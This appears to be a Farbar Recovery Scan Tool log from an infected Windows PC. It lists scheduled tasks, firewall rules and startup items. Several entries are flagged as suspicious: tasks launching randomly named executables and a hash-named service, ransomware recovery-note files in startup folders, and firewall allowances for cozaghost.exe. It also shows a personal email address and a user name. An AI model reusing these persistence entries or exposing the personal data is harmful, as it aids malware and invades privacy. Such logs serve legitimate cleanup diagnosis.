Task: {13F4F7F9-754A-479C-95B7-2668E5195C53} - System32\Tasks\ASUS Live Update2 => C:\Program Files (x86) [Argument = -check]
Task: {2283DE1E-0461-4B5C-93B8-792D6C6384D6} - System32\Tasks\{31DDBD37-5DB7-4030-8064-10B0CAA806C3} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-07-10] (COMODO)
Task: {2BD7BF5D-C4CF-4669-A2BC-FD410979401B} - System32\Tasks\ASUS Live Update1 => C:\Program Files (x86) [Argument = -critical]
Task: {39FEF968-A8FF-4F5C-9196-0E7AA2353384} - System32\Tasks\ASUS Smart Gesture Launcher => C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe [2014-03-31] (AsusTek)
Task: {4C290D38-8E4F-4E0C-8A57-748C6445EFF3} - System32\Tasks\ASUS Splendid ColorU => C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe [2013-10-07] (ASUSTeK Computer Inc.)
Task: {4D574819-623E-459C-ADAA-ABE4DA8328F0} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2014-03-20] (Realtek Semiconductor)
Task: {547698E5-4F4A-441A-BB7D-0BCEAA6F0593} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-12] (Google Inc.)
Task: {59E33C91-940C-4B1B-8875-D56CF8C1F9EA} - System32\Tasks\PinItAutoUpdate => C:\Program Files (x86)\Pinterest\Pin It\AutoUpdater.exe [2013-10-17] ()
Task: {5AA3BDDC-F135-471F-BAFD-C4667F07FEC5} - System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A} => C:\Windows\system32\pcalua.exe -a C:\Windows\986246e4d4365334c49f584d3435ca41.exe
Task: {73A5F5CB-0B75-4158-B3D5-60B79A55381B} - System32\Tasks\COMODO\COMODO Signature Update {B9D5C6F9-17D2-4917-8BD0-614BAA1C6A59} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-07-10] (COMODO)
Task: {7A810030-3719-44B1-86D4-C623F0136B7E} - System32\Tasks\COMODO\COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-07-10] (COMODO)
Task: {885E1D98-007F-4A6C-9B21-CB66F24620E1} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-02-12] (Piriform Ltd)
Task: {933A0EAA-67D1-40AD-8272-FE777ED5D1C2} - System32\Tasks\{C26243DB-2C37-44EE-9F28-CE2E8B7FC0E3} => C:\Program Files (x86)\pAuZbg.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION
Task: {97F7FC31-B27F-47F6-A95A-B187E18672B2} - System32\Tasks\{81D52804-7B29-49D2-80AA-07954E82952B} => C:\Program Files (x86)\YuIeaAuVrYQ.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION
Task: {985790D0-EF1D-4BF1-96BA-E15830E37E2E} - System32\Tasks\COMODO\COMODO Update {A6D52E4F-569B-4756-B3D8-DF217313DA85} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-07-10] (COMODO)
Task: {9C0EB61C-E232-4548-847B-0FBE48C483F2} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {9E90D4EA-24E8-466B-AEE7-2D93FD4EFF51} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate -nolegacy
Task: {9E90D4EA-24E8-466B-AEE7-2D93FD4EFF51} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(2): %windir%\system32\rundll32.exe -> appraiser.dll,DoScheduledTelemetryRun
Task: {B489F90E-C13F-4994-9853-8778C8E31344} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate
Task: {B489F90E-C13F-4994-9853-8778C8E31344} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(2): %windir%\system32\rundll32.exe -> invagent.dll,RunUpdate
Task: {B555837A-F36E-4453-A0C0-E1982D23AE8A} - System32\Tasks\ASUS Splendid ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [2013-10-07] (ASUS)
Task: {B68434B3-38F7-4E31-9788-A98D73098673} - System32\Tasks\{CF06CADB-185A-4E37-941E-EF8A74A640B8} => C:\Windows\system32\pcalua.exe -a "E:\Free Software Programs\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP\Chopper.exe" -d "E:\Free Software Programs\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP"
Task: {BCE45004-B0FC-4F7C-9E96-2E7DBD2AE33E} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-danbanic1@hotmail.com => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
Task: {C0EA6C51-0D21-4C1C-9AD2-4B14A9002B63} - System32\Tasks\{7AABF775-AB66-4734-B6C6-CD26D49E39AF} => C:\Windows\system32\pcalua.exe -a "C:\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP\Chopper.exe" -d "C:\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP"
Task: {C2E59037-9F26-40BC-B416-8F2A7E22E244} - System32\Tasks\Update Checker => C:\Program Files (x86)\ASUS\ASUS Live Update\UpdateChecker.exe [2014-03-11] ()
Task: {EB9B2DA6-E063-4F2A-A690-9A70E1E8FBE9} - System32\Tasks\RtHDVBg => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2014-03-31] (Realtek Semiconductor)
Task: {F675F9DA-7832-44FC-B84F-99A0B7E15237} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)
Task: {FBF83420-4969-4297-B1AF-91B1C6329E4F} - System32\Tasks\6320c4d4d9492959f6f8b43b8fdbf2f5 => sc start 6320c4d4d9492959f6f8b43b8fdbf2f5 <==== ATTENTION
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
 
Shortcut: C:\Users\Dan\Desktop\SoftTeddy 3D - run.bat - Shortcut.lnk -> C:\Program File (x86) SmoothTeddy 3D - Simple 3D Program\SmoothTeddy\run.bat ()
Shortcut: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ShapeShop\ShapeShop3d.com.lnk -> hxxp://www.shapeshop3d.com
Shortcut: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ShapeShop\Tutorial Videos At Vimeo.lnk -> hxxp://www.vimeo.com/shapesho
 
ShortcutWithArgument: C:\Users\Dan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\a06339e9776d4569\Instagram for Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> "
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-02-02 09:23 - 2011-02-28 18:37 - 000095008 _____ () C:\Windows\System32\Primomonnt.dll
2018-03-22 21:50 - 2018-03-22 21:50 - 000369872 _____ () C:\ProgramData\dahhService\dahhService.exe
2016-05-22 19:33 - 2016-05-22 19:33 - 000491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2017-08-11 19:17 - 2018-03-07 22:45 - 012021840 _____ () C:\Program Files\Gramblr\gramblr.exe
2018-03-22 19:26 - 2018-03-20 02:00 - 002683224 _____ () C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\swiftshader\libglesv2.dll
2018-03-22 19:26 - 2018-03-20 02:00 - 000127832 _____ () C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\swiftshader\libegl.dll
2016-05-22 19:32 - 2016-05-22 19:32 - 031680176 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
2013-05-14 22:58 - 2013-05-14 22:58 - 000047272 _____ () C:\Program Files (x86)\ASUS\Splendid\my_intel_cpp_x64.exe
2014-03-11 18:29 - 2014-03-11 18:29 - 000011776 _____ () C:\Program Files (x86)\ASUS\ASUS Live Update\UpdateChecker.exe
2014-02-24 06:59 - 2014-02-24 06:59 - 000109056 _____ () C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\ASUSWSHomeCloudAPI.dll
2018-03-22 21:52 - 2018-03-22 21:52 - 002150400 _____ () C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll
2013-09-09 21:23 - 2013-09-09 21:23 - 000162816 _____ () C:\Program Files (x86)\ASUS\Splendid\CCTAdjust.dll
2013-10-08 23:41 - 2013-10-08 23:41 - 000037968 _____ () C:\Program Files (x86)\ASUS\Splendid\DetectDisplayDC.dll
2015-06-24 15:28 - 2015-06-24 15:28 - 001301720 _____ () C:\Program Files (x86)\VMware\VMware Player\libxml2.dll
2016-08-24 08:45 - 2016-08-24 08:45 - 040523456 _____ () C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\CEF\libcef.dll
2016-06-08 00:10 - 2016-06-08 00:10 - 000118272 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\fs-ext\build\Release\fs-ext.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000205824 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-vulcanjs\build\Release\VulcanJS.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000117248 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ref\build\Release\binding.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000125440 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ffi\build\Release\ffi_bindings.node
2016-08-24 08:24 - 2016-08-24 08:24 - 000098496 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-ProxyResolver\build\Release\ProxyResolverWin.dll
2016-06-08 00:10 - 2016-06-08 00:10 - 000166400 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\idle-gc\build\Release\idle-gc.node
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\Temp:862BDB1A [139]
AlternateDataStreams: C:\Users\Dan\Downloads\Anti-CryptorBitV2.zip:BDU [1]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSPrx => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSw8 => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ColorMedia => ""="service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\groovesquid.com -> hxxps://groovesquid.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\instagram.com -> hxxps://instagram.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\mediashuttle.com -> hxxps://media-shuttle-free-trial-portal.mediashuttle.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\mycloud.com -> hxxps://idp.mycloud.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\spotify.com -> hxxps://www.spotify.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\winamp.com -> hxxps://www.winamp.com
IE restricted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\doubleclick.net -> hxxps://doubleclick.net
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 09:25 - 2018-03-22 21:51 - 000001330 _____ C:\Windows\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\asus\wallpapers\asus.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.html"
HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.png"
HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.txt"
HKLM\...\StartupApproved\Run32: => "YTDownloader"
HKLM\...\StartupApproved\Run32: => "avgnt"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKLM\...\StartupApproved\Run32: => "Dropbox"
HKLM\...\StartupApproved\Run32: => "APSDaemon"
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.html"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.png"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.txt"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.html"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.png"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.txt"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "ChocolateBar Sidebar"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "YTDownloader"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "xdm"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "CCleaner Monitoring"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{84E7D022-D859-4AAD-93A3-1E9E9F1C1E0D}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD10\PowerDVD10.EXE
FirewallRules: [{CEC34761-FBD2-4DD1-8310-5F8AAF53D82E}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nswB7A8.tmp\CnetInstaller-75409715.exe
FirewallRules: [{F5CAA7A9-D801-4982-AFF8-C7D20E365B8F}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nswB7A8.tmp\CnetInstaller-75409715.exe
FirewallRules: [{9AD6A247-DC93-49BD-8D91-890B72E639F4}] => (Allow) LPort=1886
FirewallRules: [{9EA4A53B-4ABC-431F-BAC0-C0EC0E42A3FE}] => (Allow) LPort=1886
FirewallRules: [{FEBB96C1-B31C-436C-A9CC-4ACDFDCEB1D1}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{3CE5225E-435B-4FE5-A84B-1C2A07EC44D6}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{7D2E9490-E89D-4031-927A-417C014ADFFC}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{55D48809-1F66-4497-9319-FE74A5051B36}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{E54BD4BD-3E8D-48F2-97B8-FFF46F726355}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{0FF7443B-3A64-41AE-B2A4-92DD6C564CDF}] => (Allow) C:\Users\Dan\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{5EF00627-14E5-43A4-B60F-A6A8995519C2}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{7A2FABE4-0106-4B09-A794-4F7019561123}] => (Allow) LPort=2869
FirewallRules: [{FC21E2C2-60FC-4224-9CD1-3C4CE101335A}] => (Allow) LPort=1900
FirewallRules: [{AB859042-2A95-4E72-A252-8A16F00E2698}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{07710B1F-203C-4B52-80E1-6E5A435B0B49}] => (Allow) C:\Program Files (x86)\Techgile\bin\Techgile.BRT.Helper.exe
FirewallRules: [{6E036BFF-833F-4CBD-99E0-702EBDE37553}] => (Allow) C:\Program Files (x86)\Techgile\bin\Techgile.BRT.Helper.exe
FirewallRules: [{CF59B7AE-9D77-40E1-B0FF-DD3E8617864B}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser\Winamp\winamp.exe
FirewallRules: [{A2503CB4-8DD7-4CC1-A35F-44508F1217D5}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser\Winamp\winamp.exe
FirewallRules: [{D6E98B02-4D68-4CC7-81C6-AF5504789A11}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jrmcp.exe
FirewallRules: [{E0012F5B-40C2-4C24-9F76-8D65BAE96E8D}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jrmcp.exe
FirewallRules: [{65BCBA58-B251-45D5-8F6F-4AFDD83D9EA3}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jbp.exe
FirewallRules: [{8A98D66E-7964-43B4-828C-2636B3B9C376}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jbp.exe
FirewallRules: [{C6709782-46D1-43D4-AA0D-221D650F01CE}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jwmpp.exe
FirewallRules: [{41D0374F-2166-47ED-9C01-347C96AD8EEA}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jwmpp.exe
FirewallRules: [{0D4021A7-68FA-4CAD-A92D-9B89BAB9D6D8}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\ffmpeg.exe
FirewallRules: [{61459AFB-F078-4819-83A0-32430B3DFE90}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\ffmpeg.exe
FirewallRules: [{FB331439-BAF3-421D-8363-0B7DBAF28328}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\aria2c.exe
FirewallRules: [{828F9004-D6AD-424B-B9AF-358E09E6D59D}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\aria2c.exe
FirewallRules: [{61951D9D-D9E8-4098-BBC4-DCE2C15E0A37}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\qtCopy.exe
FirewallRules: [{9D7ECD7E-4081-463D-A7A1-66901FB4631A}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\qtCopy.exe
FirewallRules: [TCP Query User{0D97D9AA-F1E5-482A-B3FF-B4CBC63122EE}C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{4D865EC7-719F-465D-8376-EDE19BB17CB9}C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{C62A3DCA-EF3A-4BFA-AD77-530BA8EB30A7}E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Block) E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{6002DF46-D0C0-4D0D-A7CF-623A681197EA}E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Block) E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{BB8345BC-ECD7-4471-B25A-9D853E961F5A}C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{7FC4D6EF-81C4-458F-9B40-AD7B400A1E4C}C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [TCP Query User{BC5A050A-5C0E-454E-A679-0B6F74B6AEEB}E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{06AE2A0A-79C9-42E3-8D44-832B7E14FA66}E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [{C1CDE395-B54A-41F5-8253-D1C74388EEBD}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [{4C545804-7C07-4B6F-B73F-E447437D340D}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [TCP Query User{F025769D-FD8B-45D2-A905-50841DDDB59B}C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe] => (Allow) C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe
FirewallRules: [UDP Query User{B22891B0-0B73-4385-81F5-B178F881D091}C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe] => (Allow) C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe
FirewallRules: [{A879E9E7-D547-4AB8-9183-31F47DA82E93}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsb7AC7.tmp\CnetInstaller-75409715.exe
FirewallRules: [{5452DD3B-F6A9-4B86-856D-2147672734F5}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsb7AC7.tmp\CnetInstaller-75409715.exe
FirewallRules: [{2029387B-0B9A-48C5-8D70-D9624A75818D}] => (Allow) C:\Program File (x86) Free Video To MP3 Converter DVDVideoSoft Three UpDate\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{23995299-1FD2-4CFE-B8AF-2086099394E8}] => (Allow) C:\Program File (x86) Free Video To MP3 Converter DVDVideoSoft Three UpDate\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{0DD782B8-3E36-4357-B248-4A58956BA95E}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsm3630.tmp\CnetInstaller-10444774.exe
FirewallRules: [{3435D53E-9FD6-4668-BF9A-6D30B08E5FEE}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsm3630.tmp\CnetInstaller-10444774.exe
FirewallRules: [{FF5E24B4-1562-4D0E-B0F0-B909F14E18B7}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsqF114.tmp\CnetInstaller-10444774.exe
FirewallRules: [{FBB98ABC-9569-4C9B-ACD7-72394C22E85A}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsqF114.tmp\CnetInstaller-10444774.exe
FirewallRules: [{7D2A9822-B4AC-4027-8630-BBA86B2B3250}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsnD7EB.tmp\CnetInstaller-75449917.exe
FirewallRules: [{B61AADD3-2D37-49CE-8846-3DBE50FB4B8A}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsnD7EB.tmp\CnetInstaller-75449917.exe
FirewallRules: [{2DA2B986-7667-4D2C-9E85-C2F81B954DE6}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsw2542.tmp\CnetInstaller-10875190.exe
FirewallRules: [{2FE73EE5-6FB3-4DC8-9CFF-B1AD59033BDD}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsw2542.tmp\CnetInstaller-10875190.exe
FirewallRules: [TCP Query User{5AC03A41-337A-4D35-8475-DBF7FCF3718C}C:\program file (x86) vlc media player videolan\vlc\vlc.exe] => (Block) C:\program file (x86) vlc media player videolan\vlc\vlc.exe
FirewallRules: [UDP Query User{3A9F9831-57E1-4FDB-984D-672AA8256557}C:\program file (x86) vlc media player videolan\vlc\vlc.exe] => (Block) C:\program file (x86) vlc media player videolan\vlc\vlc.exe
FirewallRules: [{57579DAD-B0A7-4600-BACB-ACFBD0BF582E}] => (Allow) C:\Program File (x86) 4kYoutubetomp3TWO\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{20046B7C-7FC0-4DAC-81CD-B157DC013E33}] => (Allow) C:\Program File (x86) 4kYoutubetomp3TWO\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [TCP Query User{210A33E9-6B2B-44CF-BCF6-D34BC763A901}C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{BC1DE14B-4640-475C-A83B-879941C715F5}C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [{207663F4-14AA-4B8C-8B75-0E34AECA606F}] => (Block) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [{5F89233A-ABDC-4FF1-9263-2D96AFE62121}] => (Block) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{803AE086-7E6A-48E0-8802-785AA4FC4A01}C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe] => (Allow) C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe
FirewallRules: [UDP Query User{DD0732C4-EE26-4E6D-9566-D42C50E770DC}C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe] => (Allow) C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe
FirewallRules: [{92D3E127-A9C9-4A57-A4DE-C37C30EEC069}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\Video Download Capture.exe
FirewallRules: [{6D97C59F-C2D5-4B5F-A2EB-62DED9A63774}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\Video Download Capture.exe
FirewallRules: [{595BE6ED-4AE7-4E50-8492-81EF52DC503B}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftSrv.dll
FirewallRules: [{51406614-36DB-4932-854C-7354C320CCCE}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftSrv.dll
FirewallRules: [{0FD1A6F0-6892-4528-8D02-6DA308CE78B8}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDump.dll
FirewallRules: [{F5C52100-551E-41EB-9F6B-22785A10B72E}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDump.dll
FirewallRules: [{F90CFC89-D1E5-47FE-810D-4C2A003E3EC4}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftAC.dll
FirewallRules: [{B4D1EF72-3517-40C5-A216-D67E59703BD4}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftAC.dll
FirewallRules: [{95D8704A-2EE2-4ABF-A286-E107F9FE797F}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftPlayer.dll
